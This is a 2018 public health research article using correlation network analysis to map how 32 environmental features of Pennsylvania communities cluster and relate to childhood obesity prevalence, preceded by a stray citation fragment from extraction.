Woo-kyoung Ahn, Robert L. Goldstone, Bradley C. Love, Arthur B. Markman, and Phillip Wolff, editors, Categoriza- tion inside and outside the laboratory: Essays in honor of Douglas L. Medin, pages 29–48. Ameri- can Psychological Association, Washington, DC. 133 134 work_pjnfr4gisnad5kktiybbac7hve ---- 1© 2018 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/) CONNECTIONS (INSNA) Issue 1 | Vol. 38Article | DOI: 10.21307/connections-2018-001 A network approach to understanding obesogenic environments for children in Pennsylvania Abstract Network methods have been applied to obesity to map connections between obesity-related genes, model biological feedback mecha- nisms and potential interventions, and to understand the spread of obesity through social networks. However, network methods have not been applied to understanding the obesogenic environment. Here, we created a network of 32 features of communities hypothesized to be related to obesity. Data from an existing study of determinants of obesity among 1,288 communities in Pennsylvania were used. Spearman correlation coefficients were used to describe the bivariate association between each pair of features. These correlations were used to create a network in which the nodes are community features and weighted edges are the strength of the correlations among those nodes. Modules of clustered features were identified using the walktrap method. This network was plotted, and then examined separately for communities stratified by quartiles of child obesity prevalence. We also examined the relationship between measures of network centrality and child obesity prevalence. The overall structure of the network suggests that environmental features geographically co-occur, and features of the environment that were more highly correlated with body mass index were more central to the network. Three clusters were identified: a crime-related cluster, a food- environment and land use-related cluster, and a physical activity- related cluster. The structure of connections between features of the environment differed between communities with the highest and lowest burden of childhood obesity, and a higher degree of average correlation was observed in the heaviest communities. Network methods may help to explicate the concept of the obesogenic environment, and ultimately to illuminate features of the environment that may serve as levers of community-level intervention. Keywords Obesity environment networks. Networks are everywhere (Barabasi, 2007, 2012, 2009, 2013). However, in public health, network science has only now begun to make signifi- cant in-roads. To date, network science has made contributions in diverse areas of biomedical research including cellular communication in cancer (Stites et al., 2007; Berger et al., 2012; Gill et al., 2014; Mutation Consequences and Pathway Analysis working group of the International Cancer Genome Consortium, 2015), protein–protein interactions (Jeong et al., 2001), and complex disease interactions (Barabasi, 2007; Goh et al., 2007; Hidalgo et al., 2009; Zhou et al., 2014). Common features link these diverse appli- cations, including high dimensional data and emer- Emily A. Knapp*, Usama Bilal, Bridget T. Burke, Geoff B. Dougherty and Thomas A. Glass Johns Hopkins School of Public Health. 615 N. Wolfe Street, Baltimore, MD 21205. *E-mail: eknapp2@jhu.edu. This article was edited by Eric Quintane. 2 A network approach to understanding obesogenic environments for children in Pennsylvania gent patterns not easily visible in bivariate space. Networks depict relationships among objects in a system, and network methods help identify struc- tures that influence system behavior. Obesity is a challenge for traditional public health research because we do not at present have a robust explanation for the temporal and spatial pat- terns of the obesity epidemic (Galea et al., 2010). This has led obesity researchers to seek alternative, systems science-oriented methods and approaches (Burke and Heiland, 2007; Huang et al., 2009; Finegood, 2011). Network science has made impor- tant contributions in obesity research along sever- al dimensions. First, network methods have been used to identify complex linkages among obesity- related genes in animal models (Chen and Zhang, 2013). Second, researchers have conceptualized the ‘stress-response network’ to understand how feed- back within biological systems leads to exacerbation and habituation that results in obesogenic growth (Dallman et al., 2003, 2006). Network approaches have been used to study interactions among or- ganizations and components of obesity interven- tions (Leroux et al., 2013; Marks et al., 2013), and applied to causal loop diagrams to identify lever- age points for intervention (McGlashan et al., 2016). Several studies have focused on how obesity and physical activity spread through populations like in- fection (Crandall, 1988; Christakis and Fowler, 2007; Blanchflower et al., 2009; Hammond, 2010; Hill et al., 2010; Ali et al., 2012; El-Sayed et al., 2012; Gesell et al., 2012; Simpkins et al., 2013; Hammond and Ornstein, 2014). Others have examined how obesity impacts social relationships (Brewis et al., 2011; de la Haye et al., 2011; Ali et al., 2012). Despite these advances, most network studies in obesity have focused on the structure of linkages between individuals connected through social ties. We are aware of no studies to date that focus on the struc- ture of linkages between features of the environ- ment, thought to be the main drivers of the obesity epidemic. The concept of the ‘obesogenic environment’ was first proposed in the 1990s as a model for eval- uating the contribution of environmental factors to obesity (Hill and Peters, 1998; Swinburn et al., 1999). The obesogenic environment assumes a pattern of spatially co-occurring features that jointly influence obesity risk. There is little doubt that aspects of the food and physical activity environment are important, but the question of how to identify patterns of fea- tures within the obesity environment remains unan- swered. Tools to examine the connections between features of the obesogenic environment are needed. Network analysis can be used to describe relation- ships (edges) between objects (nodes), allowing for the characterization of network-level features that are otherwise hidden. Network methods also allow us to visualize these connections, facilitating understanding of a very complex epidemic and potentially prioritizing areas for intervention. In this study, we characterize the obesogenic environment with community features as nodes, and correlations between those features as edges. A version of this methodology has been used in neurologic and genetic research and is commonly referred to as ‘Weighted Correlation Network Analysis’ (Fox et al., 2005; Zhang and Horvath, 2005). Our approach examines the structure of the relationships among multiple community features, instead of ex- amining each community feature as an independent cause of obesity. The literature demonstrates a strong relationship between environmental features that impact diet and physical activity. However, existing studies have focused on single obesity-related features in isolation, most often evaluated for their linear associations with obesity. There has been scant attention to the inter- dependence of these environmental features and how relationships between obesogenic features of the environment are structured and may create qual- itatively different risk environments for obesity. We draw from network analysis tools to study these in- terrelations between features of the environment and explore how they relate to spatial patterns of obesity prevalence. We are guided by the view that transpor- tation systems, cultural variation, markets, and other system dynamics create clusters of obesity-related features that may have synergistic and aggregative effects on population behavior. Market forces lead to clusters of restaurants, stores and activity spaces in the built environment (Hidalgo and Castañer, 2015). This clustering may potentiate the effect of any one facility by increasing the joint effect of a built and social environment designed to deliver excess calo- ries with maximal efficiency. Therefore, the cluster- ing of features and the existence of central bridging nodes that link disparate clusters may point toward novel targets for research and intervention. Our primary aim is to explore the utility of net- work analysis methods to characterize the linkages among a set of 32 spatially patterned features of the obesogenic environment. We created a weighted network of community features from 1,288 commu- nities in Pennsylvania, and examined the relationship between centrality and clustering measures and a commonly used metric of childhood overweight and 3 CONNECTIONS (INSNA) obesity (percentage of children with body mass index (BMI) percentile ≥ 85th). Methods Our goal was to model the network of hypothesized obesity-related features of local environments to better understand how network and node centrality and clustering provide insights about the role of environments in child and adolescent obesity. Data Our study was based on data from a study of children from 1,288 communities in central and northeastern Pennsylvania served by Geisinger Health System. From the system’s electronic medical records system (EMR), we previously received data on all patients between 3 and 18 years old who visited a Geisinger primary care physician from 2001 to 2012. The sample included 163,473 children and 523,674 visits. The sample is representative of the youth population in the region (Schwartz et al., 2011). This study was approved by institutional review boards at Geisinger Health Sys- tem and Johns Hopkins School of Public Health. Children were previously assigned to one of 1,288 communities based on their geocoded home address. Communities consisted of census tracts within cities, and minor civil divisions (townships and boroughs) outside of cities (Schwartz et al., 2011). From the Geisinger EMR we obtained longitudinal height and weight measurements for children. Implausible BMI values, defined as five standard deviations above and below the median, were assumed to be mismeas- urement or data entry errors and were deleted using the standard CDC SAS Program (Schwartz et al., 2011). We calculated z-scores for individual BMI, esti- mated community-level mean BMI z-score, and per- cent of children who are overweight or obese (BMI greater than or equal to the 85th percentile for age and sex). We then categorized communities accord- ing to quartiles of the percent of children with BMI at or above the 85th percentile. To characterize obesity-related features of the environment we assembled a corpus of 32 variables hypothesized to be related to obesity based on exist- ing research. These variables include demographic, economic, and geographic information from publicly available datasets, including those published by the U.S. Census, the Federal Bureau of Investigation, and two commercial data vendors, InfoUSA and Dun & Bradstreet, that provided registries of commercial food and physical activity establishments categorized using standard industry codes. Table 1 describes the community features we studied. This list was selected based on attributes that are well accepted in the literature, have acceptable measurement properties, and span a range of content domains and relations with some being related to physical activity and some related to diet. This set of variables has been used in our previous research to characterize diverse aspects of the obesity-related environment in communities (Nau et al., 2015). We categorized all variables in quintile or quartile rank scores to preserve the rank position of variables that are often poorly distributed. After reviewing variable distributions and Spearman, Pearson, and Phi correlation matrices, we chose Spearman correlations as the best representation of variable distributions and the strength of connections. Network methods Given the complex nature of obesogenic environments, we looked for a way to best characterize the relation- ships between all 32 community features. We needed to honor both the pairwise (bivariate) correlations be- tween variables and the structures that emerge from these pairwise correlations. We used a method analo- gous to Weighted Correlation Network Analysis (Zhang and Horvath, 2005). We generated a data array of co- variates (32 obesity-related community features) that we treat as nodes in a network of interconnected en- vironmental attributes. Edges were operationalized as the strength of the bivariate correlation between each pair of attributes. Bivariate correlations were estimat- ed using pairwise Spearman correlation coefficients between the community variables. Because we were primarily interested in the strength of linkages among nodes and there is controversy over the direction of the relationships between some of these variables and obesity, we chose to use the absolute value of the correlation between variables. All 992 pairwise correlations were then con- verted to a weighted undirected adjacency matrix where each cell was the correlation between any two variables. We created a weighted graph from this adjacency matrix using the R package iGraph (version 1.0.1) (Csardi and Nepusz, 2006), specifying pairwise correlations as the edge weights. From this graph, we obtained five sets of results. First, we plotted an overall network graph using all 1,288 communities. The coordinates of each node were computed using a force-based algorithm, the Fruchterman-Reingold algorithm (Fruchterman and Reingold, 1991), where the attraction between nodes is 4 A network approach to understanding obesogenic environments for children in Pennsylvania proportional to the strength of the correlation between environmental features (nodes). We implemented the version of the algorithm in the R package qgraph (version 1.3.2) (Epskamp et al., 2012). The second set of results represents the same graph stratified by community obesity burden (quartiles). For ease of interpretation we show plots corresponding to quartile 1 and 4 (the thinnest and heaviest communities, respectively (see Fig. 1 (overall network) and Fig. 2 (stratified network)). Table 1. Obesity-related community features included in network analysis. Variable identifier Feature C-1 Violent crime per 100,000 population C-2 Crimes against person per 100,000 pop C-3 Crimes against property per 100,000 pop F-1 Grocery stores and supermarkets per square mile F-2 Gas stations and convenience stores per square mile F-3 Snack stores (donuts, pretzels, ice cream) per square mile F-4 All food establishments per square mile F-5 Fast food chain restaurants, count F-6 All retail food establishments per square mile F-7 All food service establishments per square mile F-8 Diversity of food establishments in 9 categories F-9 Limited service restaurants per capita F-10 Full service restaurants per capita F-11 Bars and taverns per capita F-12 Health food and gourmet stores per capita F-13 Fruit and vegetable stores and stalls per sqare mile F-14 Discount stores per square mile L-1 Average block length L-2 Household density L-3 Road intersection density L-4 Road segment length diversity P-1 Diversity of physical activity establishments in 6 categories P-2 Indoor recreational centers per square mile P-3 Outdoor recreational centers per square mile P-4 Public outdoor parks and recreational spaces per street mile P-5 All physical activity establishments per square mile P-6 Indoor fitness and recreational facilities per street miles P-7 Outdoor fitness & recreational facilities per capita P-8 Indoor recreational clubs and organizations per square mile P-9 Outdoor recreational clubs and organizations per square mile T-1 Vehicle miles traveled on main roads (total) T-2 Vehicle miles traveled on main roads per capita Notes: Data are from combined Info USA and D&B databases, 2000; the Federal Bureau of Investigation Uniform Crime Reporting System; U.S. Census 2000; and Pennsylvania State Government. 5 CONNECTIONS (INSNA) Third, in order to better understand the relation- ships between the components of the obesogenic environment, we sought to obtain a measure of clus- tering and community structure that allowed us to evaluate if network structure was different across communities classified by prevalence of childhood obesity. We conducted a module detection analysis using the walktrap method (Pons and Latapy, 2005) that performs a series of ‘random walks’ between nodes. The probability of ‘walking’ from one node to the next is proportional to the weight of the edge between the nodes, meaning that a walk is more likely to occur between two highly correlated nodes. Each node is restricted to membership in one module. This creates modules of variables that are highly connected to each other. We then calculated the normalized network modularity score (Newman, 2006), which quantifies the strength of the connections within and between modules. A higher modularity score indi- cates a network with high within-module connectivity and low between-module connectivity. We calculated the modularity score for the overall network graph and each of the four graphs based on community strata of burden of childhood obesity (see Table 2). We used the pairwise correlation between variables (nodes) as a weight in the computation of modularity. Fourth, we calculated an overall measure of network centrality by calculating the average network degree (Barrat et al., 2004). In a weighted undirected net- work like ours, average network degree is the mean of all pairwise correlations (Barrat et al., 2004). A high average network degree represents a network that has an overall tighter correlation between all nodes. We calculated average network degree for the overall network graph and each of the four network graphs based on obesity prevalence (see Table 2). Fifth, we examined the association between the centrality of a node and its correlation with the prevalence of childhood obesity. For this, we plot- ted the degree centrality of each node against that node’s correlation with the prevalence of childhood obesity (Fig. 3). Figure 1: Network graph for 1,288 communities in Pennsylvania. This shows a graph of the network of connections between attributes of communities in 1,288 communities in Pennsylvania. Each node in the network represents one feature of the communities, and the edges in the network are absolute values of Spearman correlation coefficients. The bivariate correlation between each variable and average body mass index (BMI) z-score is shown by the shading of each node, with darker colors representing stronger absolute correlation with average community BMI z-score. The strength of absolute correlation between two nodes is represented by the darkness and thickness of the lines connecting the variables. A thick, dark line may represent either a strong positive or a strong negative correlation. Modules of highly connected variables were created using the walktrap method. 6 A network approach to understanding obesogenic environments for children in Pennsylvania Results The purpose of this analysis was to apply network methodology to characterize patterns of linkages and interactions among obesity-related environ- mental features among communities in Penn- sylvania. Figure 1 is a graph of the network of connections (pairwise correlations) between nodes (obesity-related features) in 1,288 Pennsylvania communities. Figure 2: Network Graphs for 1288 Communities in Pennsylvania, by Quartile of Percent of Children at or Above the 85th Percentile of BMIz. In communities in the lowest quartile of percent of children who are overweight or obese (A: left), community features appear to be less tightly clustered, i.e., co-occur less often, than in communities in the highest quartile of community BMIz (B: right). Table 2. Network modularity and average network degree in the overall network and by quartile of prevalence of childhood obesity. Quartiles of prevalence of childhood obesity Quartile 1 Quartile 2 Quartile 3 Quartile 4 Overall network Network modularity 0.1891 0.2681 0.1181 0.0982 0.1496 Average network degree 0.3318 0.3533 0.3584 0.3623 0.3507 Note: Quartile 1 represents communities with the lowest prevalence of child overweight and obesity, and quartile 4 represents communities with the highest prevalence of child overweight and obesity. Higher modularity indicates a network with high within-module connectivity and low between-module connectivity. Average network degree is the mean of all pairwise correlations. 7 CONNECTIONS (INSNA) The graph illustrates three important network char- acteristics. First, three clusters of tightly-connected variables were identified using the walktrap method. A cluster of the three crime-related variables (rates per 100,000 persons of crimes against property, crimes against persons, and all Part I offenses) can be seen (green shading), and is weakly linked to the main net- work. This suggests that communities with high rates of violent crime (i.e., assault) also have high rates of crime against property (i.e., arson). Crime rates appear to be moderately correlated with obesity rates as indi- cated by the dark color of the crime-related nodes. A second cluster is identified consisting of features rep- resenting land use patterns, transportation, and food establishment density (yellow shading). We believe this represents the spatial clustering that occurs in the context of suburban sprawl with co-location of establishments in high-volume transportation corridors. The nodes at the heart of this cluster in- clude household density (per square mile) and all food establishments per square mile. This second cluster appears to be the tightest. Eleven of the 14 nodes have an above average absolute correlation with obe- sity. The model identified a third cluster (pale blue shading) consisting mostly of features that describe the physical activity environment. These include diver- sity of physical activity establishments, outdoor rec- reational facilities per square mile, snack stores (e.g., donuts, pretzels, ice cream) per square mile, indoor recreation centers per square mile, all physical activity establishments per square mile, indoor fitness and recreational facilities per street mile, and indoor recre- ational clubs and facilities per square mile. In both the second and third clusters, the nodes that are most highly correlated with obesity (indicated by darker node color), are more central in the network overall, as well as within each cluster. Not all of the food or physical activity nodes are clustered. At the edge of the graph we see several food or physical activity nodes that are not as tightly coupled (including parks and big box stores). Finally, the overall structure of the network suggests that elements of these communities are geographically clustered and are not randomly dis- persed across communities, especially features of the physical, food, and land use environments. Next, we were interested in whether the struc- ture of this network of features varied across strata of community obesity burden. Figure 2 shows the result of running a similar network model separately by quartile of percent of children at or above the 85th percentile on BMI-z, a threshold widely considered to be indicative of overweight and obesity burden. Among communities in the lowest quartile of obesi- ty prevalence (Fig. 2A), community features appear to be less tightly connected than in communities in the highest quartile of obesity prevalence (Fig. 2B). This is also described by the higher modularity in Table 2. For example, among lower obesity prevalence communities, crime is weakly linked to the land use- food- physical activity cluster; but in higher obesity prevalence communities, crime is more tightly linked to this cluster. It is not just that quantities of these fea- tures are larger in heavier communities, but that the connections between features are also altered: com- munities that give rise to higher rates of childhood obesity are structured differently than those with less child obesity. Figure 3: Association of degree centrality of each community feature with prevalence of overweight and obesity among children. Correlation between community features and body mass index is stronger for more central variables of the obesity-related network features (R = 0.51). 8 A network approach to understanding obesogenic environments for children in Pennsylvania Table 2 shows the results of the network structure analysis, overall, and stratified by quartile of obesity. The overall network has a positive modularity of 0.15, indicating that the nodes (environmental features) show a degree of clustering (as compared to a ran- dom distribution of nodes with no clustering). In the analysis stratified by prevalence of childhood obesi- ty, communities in the 1st and 2nd quartile (thinnest communities) show a higher modularity compared to communities in the 3rd and 4th quartile (heaviest communities) (modularity of 0.19 and 0.27 vs. 0.12 and 0.09, respectively). This means that the modules of variables in thinner communities are either more clustered within each module or have weaker con- nections to variables in other modules, and that in the heaviest communities variables (nodes) exhibit a lower degree of clustering in modules (as can be seen in Fig. 2). For example, a comparison of the two panels in Figure 2 demonstrates that the crime-related cluster shown in green has fewer strong ties (shown by darker lines) to the center of the network in the thinner communities on the left panel compared to the heavier communities in the right panel. Similarly, the average network degree is higher in the heaviest communities (degree = 0.362) compared with the thinnest communities (degree = 0.332), representing higher average correlation (i.e., stronger connections), between variables in communities with higher preva- lence of childhood obesity. Figure 3 shows the relationship between the degree centrality of each community feature (node) with the bivariate correlation of that feature with child- hood overweight and obesity prevalence (percent of kids above the 85th BMI percentile). Each dot represents one of the 32 community features. The correlation between the degree of each feature and its correlation with the prevalence of childhood obe- sity is positive (r = 0.51), indicating that more ‘central’ variables have a stronger association with the out- come. For example, fresh fruit and vegetable stands per square mile has a low correlation with community obesity, and can be seen in Figure 1 as a variable far from the center of the network and with only a few weak ties into the rest of the network. Discussion We applied network methodology in order to describe linkages between community features associated with obesity. We used network analysis to characterize the obesogenic environment: instead of treating individual features of communities in isolation, this method hon- ors the interactions and spatial co-occurrence that make up this landscape of obesity risk. This work suggests that (i) there are identifiable clusters of environmental features; (ii) that the level of connectivity and structure of features in the network may be informative; and (iii) that features more highly associated with obesity are more likely to be central in the network of community features. Three clusters were identified in the overall network: a cluster of crime-related variables that was weakly linked into the main network, and food and land use and physical activity clusters, respectively. In communities strati- fied by prevalence of childhood obesity, the structure and overall connectivity of the network appeared to differ by level of obesity. Not only are the values of these attributes different in the heaviest and thinnest communities, but also the patterns of connections are different. We also found that centrality alone, as measured by degree, is correlated with obesity. Obesity-related features are therefore more tightly geographically clustered. This may be evidence of synergy between features of the obesogenic environ- ment, of non-independent features of communities that join forces to shape obesity risk. Understanding and intervening on the drivers of the obesity epidemic is a challenge for obesity re- searchers and policy makers. Obesity is complex and has multiple drivers at the individual, communi- ty, and state and national levels (Huang et al., 2009). Traditional methods such as regression models fail to account for interaction between multiple factors at multiple scales, the complexity and importance of contextual factors, and feedback loops and oth- er dynamic processes (Hammond, 2009). Although our work is preliminary, it suggests that systems ap- proaches to obesity may be useful for characterizing linkages among features of the environment. Despite the recognition that environmental features of com- munities play a strong role in the obesity epidemic, network methods to characterize linkages between attributes of communities has been underutilized. The structure and strength of these linkages may provide evidence for geographic areas or types of clusters of features that would be most efficient for intervention. Network methods, especially graphical methods, could be used to help set priorities for obesity-relat- ed interventions in communities. For example, food establishments exhibited both high centrality (as measured by degree) in our network and high cor- relation with childhood obesity (Fig. 3). Using these network graphs (e.g., Fig. 2), we can narrow in on features such as these that may have far reaching effects, if intervened upon. This is consistent with the 9 CONNECTIONS (INSNA) literature on ‘food swamps’ and ‘food deserts’ – but helps to prioritize interventions in this area because these features are more central. This could point to the effectiveness of intervening on such variables that are highly central in the network, and thus may have more far-reaching effects than intervention on less central variables. Network methods may help identify such synergistic actors that could have large effects on obesity due to their connections to other variables. In particular, our work points toward possible inter- ventions regarding community-zoning policies. Our network graphs show tight clusters of food-related (e.g., grocery and convenience stores, fast food and full-service restaurants) and land use (e.g., road block length, household density) features that are strongly correlated with obesity. Restructuring the community environment may be a promising avenue for obesity prevention. Considering communities to be complex systems where multiple interrelated phenomena act together to create an obesogenic environment, these methods also push us to con- sider intervening on not just the environmental fea- tures themselves, but also on the linkages between features. This is a new way to approach the obesity epidemic – by looking for factors that may be link- ing features, or that can be manipulated to disrupt harmful connections. For example, the crime-related cluster is more tightly linked to the network among communities with more childhood obesity. Further research into the underlying causes of this linkage (and why it differs in communities stratified by child- hood obesity prevalence) may illuminate important drivers of the obesity epidemic. This work also has methodological implications for obesity research. Future work should explore the mechanisms for how these clusters are associated with increased obesity prevalence, and whether inter- ventions on features in this network change the net- work structure itself. This future research should con- sider the relationships, or clustering, of these features. Evaluating independent associations between any single feature and obesity rates would ignore the com- plex inter-relations this work has highlighted. Other methods that acknowledge these clusters of features, such as latent variable methods (Nau et al., 2015), may be more appropriate to honor the way that en- vironmental features cluster together and to uncover unobserved sources of the correlation observed in this network. We have data from a large and diverse geographic area that includes urban, rural, and suburban com- munities. However, this analysis is exploratory. We are not able to rule out the possibility that popula- tion density and development may be a common cause of many of the variables we selected. This is potentially a source of bias or a possible explana- tion for the clustering of features of the environment on which our study is based. It is widely recognized that obesity-related characteristics of communities are geographically correlated. The reasons for those correlations are not well understood. Our results, we believe, support the utility of network methods for the study of environments that are not formed randomly, but which are shaped by diverse market and demo- graphic forces that may be important in driving spatial variation in obesity rates. Conclusion Network analysis may be a useful tool for evaluating obesogenic environments and other questions of interest in epidemiology. This preliminary analysis suggests that patterns of clustering and connections between features of the environment are important. Land use and food features are strongly linked (espe- cially in ‘heavier’ communities), and features are more highly clustered in communities with higher average BMI. Network methods can illuminate patterns of link- ages and key factors in obesogenic environments. Network position (centrality) is correlated with aver- age BMI. Ultimately, the goal of this type of analysis would be to identify highly connected community features that can be used as levers of intervention to reduce population rates of obesity. Acknowledgements Emily Knapp was supported by the Clinical Research and Epidemiology in Diabetes and Endocrinolo- gy Training Grant (T32DK062707). Usama Bilal was supported by a fellowship from the Obra Social La Caixa and by a Johns Hopkins Center for a Livable Future-Lerner Fellowship. Bridget Teevan Burke was supported by the Epidemiology and Biostatistics of Aging Training Grant (T32AG000247). Data for this manuscript were collected as part of a project supported by grant number U54HD070725 from the Eunice Kennedy Shriver National Institute of Child Health and Human Development (NICHD). The project is co-funded by the NICHD and the Office of Behavioral and Social Sciences Research (OBSSR). The content is solely the responsibility of the authors and does not necessarily represent the official views of the NICHD or OBSSR. 10 A network approach to understanding obesogenic environments for children in Pennsylvania Literature Cited Ali, M.M., Amialchuk, A. and Rizzo, J.A. 2012. The in- fluence of body weight on social network ties among ad- olescents. Economics and Human Biology 10(1): 20–34. Ali, M.M., Amialchuk, A., Gao, S. and Heiland, F. 2012. Adolescent weight gain and social networks: Is there a contagion effect?. Applied Economics 44(23): 2969–83. Barabasi, A.L. 2007. Network medicine – from obesity to the ‘diseasome’. The New England Journal of Medicine 357(4): 404–7, doi: 10.1056/NEJMe078114. Barabasi, A.L. 2009. Scale-free networks: A decade and beyond. Science 325(5939): 412–3. Barabasi, A.L. 2012. Network science: Luck or reason. Nature 489(7417): 507–8. Barabasi, A.L. 2013. Network science. Philo- sophical Transactions of the Royal Society A Mathe- matical Physicla and Engineering Science 371(1987): 20120375. Barrat, A., Barthélemy, M., Pastor-Satorras, R. and Vespignani, A. 2004. The architecture of com- plex weighted networks. Proceedings of the National Academy of Sciences of the United States of America 101(11): 3747–52, doi: 10.1073/pnas.0400087101. Berger, E., Vega, N., Vidal, H. and Geloen, A. 2012. Gene network analysis leads to functional validation of pathways linked to cancer cell growth and survival. Biotechnology Journal 7(11): 1395–404. Blanchflower, D.G., Landeghem, B. and Oswald, A.J. 2009. Imitative obesity and relative utility. Journal of the European Economic Association 7(2–3): 528–38. Brewis, A.A., Hruschka, D.J. and Wutich, A. 2011. Vulnerability to fat-stigma in women’s everyday rela- tionships. Social Science and Medicine 73(4): 491–7. Burke, M.A. and Heiland, F. 2007. Social dynamics of obesity. Economic Inquiry 45(3): 571–91. Chen, Z. and Zhang, W. 2013. Integrative analysis using module-guided random forests reveals corre- lated genetic factors related to mouse weight. PLOS Computational Biology 9(3): e1002956. Christakis, N.A. and Fowler, J.H. 2007. The spread of obesity in a large social network over 32 years. The New England Journal of Medicine 357(4): 370–9. Crandall, C.S. 1988. Social contagion of binge eat- ing. Journal of Personality and Social Psychology 55(4): 588–98. Csardi, G. and Nepusz, T. 2006. The igraph soft- ware package for complex network research. Inter- Journal Complex Systems 1695, 1–9. Dallman, M.F., Pecoraro, N., Akana, S.F., La Fleur, S.E., Gomez, F., Houshyar, H., Bell, M.E., Bhatnagar, S., Laugero, K.D. and Manalo, S. 2003. Chronic stress and obesity: A new view of ‘comfort food’. Proceed- ings of Natlional Academy of Science of the United States of America 100(20): 11696–701. Dallman, M.F., Pecoraro, N.C., La Fleur, S.E., Warne, J.P., Ginsberg, A.B., Akana, S.F., Laugero, K.C., Houshyar, H., Strack, A.M., Bhatnagar, S. and Bell, M.E. 2006. Glucocorticoids, chronic stress, and obesity. Progress in Brain Research 153, 75–105. de la Haye, K., Robins, G., Mohr, P. and Wilson, C. 2011. Homophily and contagion as explanations for weight similarities among adolescent friends. Journal of Adolescent Health 49(4): 421–7. El-Sayed, A.M., Scarborough, P., Seemann, L. and Galea, S. 2012. Social network analysis and agent- based modeling in social epidemiology. Epidemiologic Perspectives and Innovations 9(1): 1. Epskamp, S., Cramer, A.O.J., Waldorp, L.J., Schmittmann, V.D. and Borsboom, D. 2012. qgraph: Network visualizations of relationships in psychometric data. Journal of Statistical Software 48(4): 1–18. Finegood, D.T. 2011. The complex systems science of obesity. in Cawley, J. (Ed.), The Oxford Handbook of Social Science of Obesity, Oxford University Press, New York, 208–36. Fox, M.D., Snyder, A.Z., Vincent, J.L., Corbetta, M., Van Essen, D.C. and Raichle, M.E. 2005. The human brain is intrinsically organized into dynamic, anticorre- lated functional networks. Proceedings of the National Academy of Sciences of the United States of America 102(27): 9673–8, doi: 10.1073/pnas.0504136102. Fruchterman, T.M.J. and Reingold, E.M. 1991. Graph drawing by force-directed placement. Software: Practice and Experience 21(11): 1129–64, doi: 10.1002/ spe.4380211102. Galea, S., Riddle, M. and Kaplan, G.A. 2010. Causal thinking and complex system approaches in epide- miology. International Journal of Epidemiology 39(1): 97–106. Gesell, S.B., Tesdahl, E. and Ruchman, E. 2012. The distribution of physical activity in an after-school friendship network. Pediatrics 129(6): 1064–71, doi: 10.1542/peds.2011-2567. Gill, R., Datta, S. and Datta, S. 2014. Differential network analysis in human cancer research. Current Pharmaceutical Design 20(1): 4–10. Goh, K.I., Cusick, M.E., Valle, D., Childs, B., Vidal, M. and Barabasi, A.L. 2007. The human disease net- work. Proceedings of Natlional Academy of Science of the United States of America 104(21): 8685–90, doi: 10.1073/pnas.0701361104. Hammond, R. 2009. Complex systems modeling for obesity research. Preventing Chronic Disease 6(3): 1–10. 11 CONNECTIONS (INSNA) Hammond, R.A. 2010. Social influence and obesity. Current Opinion in Endocrinology, Diabetes and Obe- sity 17(5): 467–71. Hammond, R.A. and Ornstein, J.T. 2014. A model of social influence on body mass index. Annals of the New York Academy of Science 1331, 34–42. Hidalgo, C.A. and Castañer, E.E. 2015. The amenity space and the evolution of neighborhoods. arXiv:1509. 02868 [physics.soc-ph] Hidalgo, C.A., Blumm, N., Barabasi, A.L. and Chris- takis, N.A. 2009. A dynamic network approach for the study of human phenotypes. PLOS Computational Biol- ogy 5(4): e1000353, doi: 10.1371/journal.pcbi.1000353. Hill, A.L., Rand, D.G., Nowak, M.A. and Christakis, N.A. 2010. Infectious disease modeling of social con- tagion in networks. PLOS Computational Biology 6(11): e1000968. Hill, J.O. and Peters, J.C. 1998. Environmental con- tributions to the obesity epidemic. Science 280(5368): 1371–4. Huang, T.T., Drewnosksi, A., Kumanyika, S. and Glass, T.A. 2009. A systems-oriented multilevel frame- work for addressing obesity in the 21st century. Pre- venting Chronic Disease 6(3): A82. Jeong, H., Mason, S.P., Barabasi, A.L. and Oltvai, Z.N. 2001. Lethality and centrality in protein networks. Nature 411(6833): 41–2, doi: 10.1038/35075138. Leroux, J.S., Moore, S. and Dubé, L. 2013. Beyond the ‘I’ in the obesity epidemic: A review of social rela- tional and network interventions on obesity. Journal of Obesity 2013, 348249. McGlashan, J., Johnstone, M., Creighton, D., de la Haye, K. and Allender, S. 2016. Quantifying a sys- tems map: Network analysis of a childhood obesity causal loop diagram. PLOS ONE 11(10): e0165459, doi: 10.1371/journal.pone.0165459. Marks, J., Barnett, L.M., Foulkes, C., Hawe, P. and Allender, S. 2013. Using social network analy- sis to identify key child care center staff for obesity prevention interventions: A pilot study. J Obes 2013, 919287. Mutation Consequences and Pathway Analysis working group of the International Cancer Genome Consortium 2015. Pathway and network analysis of cancer genomes. Nature Methods 12(7): 615–21. Nau, C., Ellis, H., Huang, H., Schwartz, B.S., Hirsch, A., Bailey-Davis, L., Kress, A.M., Pollak, J. and Glass, T.A. 2015. Exploring the forest instead of the trees: An innovative method for defining obesogenic and obeso- protective environments. Health Place 35, 136–46, doi: 10.1016/j.healthplace.2015.08.002. Newman, M.E.J. 2006. Modularity and community structure in networks. Proceedings of the National Academy of Sciences of the United States of America 103(23): 8577–82, doi: 10.1073/pnas.0601602103. Pons, P. and Latapy, M. 2005. Computing com- munities in large networks using random walks. in Yolum, P., Güngör, T., Gürgen, F. and Özturan, C. (Eds), Computer and Information Sciences – ISCIS 2005: Proceedings of the 20th International Symposium, Istanbul, Turkey, October 26–28, 2005 Springer, Berlin, Heidelberg, 284–93. Schwartz, B.S., Stewart, W.F., Godby, S., Pollak, J., Dewalle, J., Larson, S., Mercer, D.G. and Glass, T.A. 2011. Body mass index and the built and social environments in children and adolescents using electronic health records. American Journal of Pre- ventive Medicine 41(4): e17–e28, doi: 10.1016/j.ame- pre.2011.06.038. Simpkins, S.D., Schaefer, D.R., Price, C.D. and Vest, A.E. 2013. Adolescent friendships, BMI, and physical activity: Untangling selection and influence through longitudinal social network analysis. Journal of Research Adolescence 23(3): doi: 10.1111/j.1532- 7795.2012.00836.x. Stites, E.C., Trampont, P.C., Ma, Z. and Ravichan- dran, K.S. 2007. Network analysis of oncogenic Ras activation in cancer. Science 318(5849): 463–7. Swinburn, B., Egger, G. and Raza, F. 1999. Dissect- ing obesogenic environments: The development and application of a framework for identifying and prioritizing environmental interventions for obesity. Preventive Med- icine 29(6 Pt 1): 563–70, doi: 10.1006/pmed.1999.0585. Zhang, B. and Horvath, S. 2005. A general frame- work for weighted gene co-expression network analy- sis. Statistical Applications in Genetics and Molecular Biology Epub 2005. Zhou, X., Menche, J., Barabasi, A.L. and Sharma, A. 2014. Human symptoms-disease network. Nature Communication 5, 4212, doi: 10.1038/ncomms5212. , network science 